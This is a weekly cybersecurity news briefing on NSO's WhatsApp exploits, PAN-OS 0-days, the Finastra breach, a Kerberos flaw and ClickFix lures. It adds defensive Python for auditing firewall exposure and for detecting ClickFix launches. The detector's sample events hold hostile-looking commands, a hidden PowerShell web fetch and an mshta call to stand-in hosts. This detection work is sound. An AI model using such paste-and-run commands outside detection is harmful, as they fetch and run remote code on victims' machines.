Cyber Security Weekly Briefing, 16 - 22 November
NSO Group developed exploits to install Pegasus via WhatsApp
NSO Group used several 0-day exploits against WhatsApp vulnerabilities to deploy Pegasus spyware in zero-click attacks. According to court documentation, NSO developed the Heaven exploit in 2018, spoofing the app's official installer to deploy Pegasus. In 2019 it developed another exploit, Eden, to bypass the protections WhatsApp had introduced in 2018. WhatsApp patched both and disabled NSO's accounts.
The company's latest exploit, Erised, used WhatsApp's relay servers to install Pegasus. Installation was initiated when an NSO customer entered a target's phone number into a program running on their computer, which triggered the remote installation of Pegasus on the target's device; targets included the European government sector.
0-day flaws under active exploitation fixed in PAN-OS firewalls
Palo Alto Networks has fixed two 0-day vulnerabilities in its NGFW firewalls. The first, CVE-2024-0012 (CVSSv4 9.3 according to the vendor), is an authentication bypass that lets attackers gain administrative privileges. The second, CVE-2024-9474 (CVSSv4 6.9 according to Palo Alto), allows privilege escalation to root. Both affect PAN-OS 10.2, 11.0, 11.1 and 11.2; Cloud NGFW and Prisma Access are not affected.
Attacks exploiting these flaws have targeted management interfaces exposed to untrusted networks, with activity including command execution and webshell deployment. Palo Alto Networks recommends patching, restricting management access to trusted internal IP addresses, following security best practices and reviewing the indicators of compromise.
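The vendor's central mitigation is to keep the management interface reachable only from trusted internal addresses. The following is an added example, not Palo Alto Networks code: a small audit that checks a constructed inventory of firewall management interfaces against an allowlist of trusted ranges. The inventory format, the field names and the convention that an empty `permitted` list means "no source restriction" are assumptions made for illustration.

```python
"""Audit firewall management-interface exposure against trusted internal ranges.

Added example (not vendor code). Inventory format and field names are assumed.
"""
import ipaddress

# Trusted management networks (assumed: the RFC 1918 private ranges).
TRUSTED = [
    ipaddress.ip_network(n)
    for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")
]

# Constructed inventory, one entry per management interface (hypothetical devices).
# "permitted" lists the source ranges allowed to reach the interface; an empty
# list is taken to mean no restriction is configured (assumption).
INVENTORY = [
    {"device": "fw-dc1", "mgmt_ip": "10.20.0.5", "permitted": ["10.20.0.0/16"]},
    {"device": "fw-edge", "mgmt_ip": "203.0.113.10", "permitted": ["0.0.0.0/0"]},
    {"device": "fw-branch", "mgmt_ip": "192.168.50.1",
     "permitted": ["192.168.50.0/24", "198.51.100.0/24"]},
    {"device": "fw-lab", "mgmt_ip": "172.16.8.2", "permitted": []},
]


def within_trusted(net, trusted):
    """True when the whole source range lies inside one trusted range."""
    return any(net.subnet_of(t) for t in trusted)


def audit(inventory, trusted=TRUSTED):
    """Return (device, finding) pairs for every exposure found in the inventory."""
    findings = []
    for entry in inventory:
        device = entry["device"]
        mgmt = ipaddress.ip_address(entry["mgmt_ip"])
        # The interface address itself should sit on an internal network.
        if not any(mgmt in t for t in trusted):
            findings.append((device, "management IP is outside trusted ranges"))
        # No permitted-source list at all means anyone who can route to it may try.
        if not entry["permitted"]:
            findings.append((device, "no source restriction configured"))
        # Each permitted source range must be fully contained in a trusted range;
        # 0.0.0.0/0 or a public /24 fails this check.
        for cidr in entry["permitted"]:
            net = ipaddress.ip_network(cidr, strict=False)
            if not within_trusted(net, trusted):
                findings.append(
                    (device, f"permitted source {cidr} is outside trusted ranges")
                )
    return findings


if __name__ == "__main__":
    for device, finding in audit(INVENTORY):
        print(f"{device}: {finding}")
```

The check deliberately avoids `ip_address.is_private`, which treats documentation ranges such as 203.0.113.0/24 as private; an explicit allowlist of the organisation's own management networks is the safer basis for the decision.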
Finastra, supplier to 45 of the world's 50 largest banks, acknowledges incident
As reported by security researcher Brian Krebs, Finastra, a financial software provider with more than 8,000 customers in 130 countries, including 45 of the world's 50 largest banking institutions, has sent its customers a statement reporting unauthorized access to its IBM Aspera-hosted SFTP server, which reportedly resulted in data exfiltration.
According to the company, the threat actor did not deploy malware or manipulate any client files within the environment. Around the time the statement was issued, on November 8, a BreachForums user under the alias abyss0 offered for sale 400 GB of data purportedly exfiltrated from the company, apparently including an undetermined volume of customer data. Finastra has indicated, however, that the scope and nature of the data in the leaked files remain to be determined.
Critical bug fixed in Microsoft Kerberos
Microsoft has fixed a critical vulnerability in Kerberos, the protocol Windows uses to authenticate host and user identities. The flaw, CVE-2024-43639, with a CVSSv3 score of 9.8, allows unauthenticated attackers to send spoofed requests to vulnerable systems and, by exploiting a weakness in the cryptographic protocol, gain unauthorized access and execute code remotely.
In addition, Censys reported that more than 1 million exposed Windows Server instances could be vulnerable, since servers configured as a Kerberos KDC proxy are affected. More than half of these devices had TCP port 443 open; 34% of the vulnerable servers are located in the United States, and 11% are associated with the IT provider Armstrong Enterprise Communications. To mitigate the risk, apply the corresponding updates as soon as possible.
Attacks using ClickFix technique
Researchers at Proofpoint published research on social engineering campaigns using the technique known as ClickFix. The technique was first observed in use by the threat actor TA571 earlier this year, but numerous groups have since incorporated it into their attack methodologies.
The technique uses windows displaying fake error messages to trick people into copying, pasting and executing malicious content on their own computers. Proofpoint has observed ClickFix campaigns delivering malware including AsyncRAT, Danabot, DarkGate, Lumma Stealer and NetSupport. The lure can be delivered through compromised websites, documents, HTML attachments and malicious URLs, among other vectors.
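Because the victim runs the pasted content themselves, the telltale artefact on the endpoint is an interpreter launched directly from the user's shell with a command line that fetches or decodes something. The following is an added example, not Proofpoint's detection logic: a heuristic run over constructed process-creation events. The event format, the interpreter list, the choice of `explorer.exe` as the parent of interest and the command-line patterns are assumptions for illustration and should be tuned to your own telemetry.

```python
"""Flag paste-and-run process launches matching the ClickFix pattern.

Added example (not Proofpoint code). Event schema and heuristics are assumed.
"""
import re

# Interpreters typically handed a pasted command (assumed list).
INTERPRETERS = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe",
}

# Command-line traits suggesting remote retrieval or obfuscation (assumed heuristics).
SUSPICIOUS = re.compile(
    r"https?://|-enc(odedcommand)?\b|frombase64string|-w(indowstyle)?\s+hidden",
    re.IGNORECASE,
)


def basename(path):
    """Return the file name of a Windows path, lower-cased."""
    return path.rsplit("\\", 1)[-1].lower()


def is_clickfix_like(event):
    """True when the user's shell spawned an interpreter with a suspicious command line."""
    parent = basename(event["parent_image"])
    child = basename(event["image"])
    if parent != "explorer.exe" or child not in INTERPRETERS:
        return False
    return SUSPICIOUS.search(event["command_line"]) is not None


def scan(events):
    """Return the ids of events that match the heuristic."""
    return [e["id"] for e in events if is_clickfix_like(e)]


# Constructed sample events (not real telemetry); hosts use the reserved .invalid TLD.
SAMPLE_EVENTS = [
    {"id": 1, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": 'powershell -w hidden -c "Invoke-WebRequest http://fix.example.invalid/check"'},
    {"id": 2, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe /c dir C:\\Users"},
    {"id": 3, "parent_image": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1"},
    {"id": 4, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "command_line": "mshta https://update.example.invalid/page.hta"},
    {"id": 5, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "command_line": "notepad.exe http://intranet.example.invalid/readme.txt"},
]


if __name__ == "__main__":
    print("suspicious event ids:", scan(SAMPLE_EVENTS))
```

Event 3 is excluded because a scheduled script launched by a service is not a user paste, and event 5 because Notepad is not an interpreter; only the two user-launched interpreters that reach out to a URL are flagged. In production, the parent condition would be widened to whatever hosts the Run dialog or terminal in your environment, and the matches correlated with the browser session that presented the fake error.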